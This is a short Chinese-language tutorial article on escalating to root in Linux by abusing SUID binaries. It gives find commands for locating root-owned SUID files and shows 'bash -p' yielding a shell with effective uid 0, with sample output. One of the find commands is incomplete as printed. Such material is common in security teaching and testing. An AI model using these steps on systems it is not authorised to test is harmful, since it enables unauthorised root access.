Linux下如何利用SUID提權(quán)

發(fā)布時(shí)間：2022-10-19 14:50:10 來(lái)源：億速云閱讀：134 作者：iii 欄目：建站服務(wù)器

今天小編給大家分享一下Linux下如何利用SUID提權(quán)的相關(guān)知識(shí)點(diǎn)，內(nèi)容詳細(xì)，邏輯清晰，相信大部分人都還太了解這方面的知識(shí)，所以分享這篇文章給大家參考一下，希望大家閱讀完這篇文章后有所收獲，下面我們一起來(lái)了解一下吧。

SUID是Linux的一種權(quán)限機(jī)制，具有這種權(quán)限的文件會(huì)在其執(zhí)行時(shí)，使調(diào)用者暫時(shí)獲得該文件擁有者的權(quán)限。如果擁有SUID權(quán)限，那么就可以利用系統(tǒng)中的二進(jìn)制文件和工具來(lái)進(jìn)行root提權(quán)。

以下命令可以發(fā)現(xiàn)系統(tǒng)上運(yùn)行的所有SUID可執(zhí)行文件。具體來(lái)說(shuō)，命令將嘗試查找具有root權(quán)限的SUID的文件。

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls

Linux下如何利用SUID提權(quán)

以上所有二進(jìn)制文件都將以root用戶權(quán)限執(zhí)行，因?yàn)樗鼈兊臋?quán)限中包含"s"，并且對(duì)應(yīng)的是root權(quán)限。

Bash

以下命令將以root權(quán)限打開一個(gè)bash shell。

bash -p
bash-3.2# id
uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)

Linux下如何利用SUID提權(quán)

以上就是“Linux下如何利用SUID提權(quán)”這篇文章的所有內(nèi)容，感謝各位的閱讀！相信大家閱讀完這篇文章都有很大的收獲，小編每天都會(huì)為大家更新不同的知識(shí)，如果還想學(xué)習(xí)更多的知識(shí)，請(qǐng)關(guān)注億速云行業(yè)資訊頻道。

向AI問(wèn)一下細(xì)節(jié)

Linux下如何利用SUID提權(quán)

猜你喜歡

最新資訊

相關(guān)推薦

相關(guān)標(biāo)簽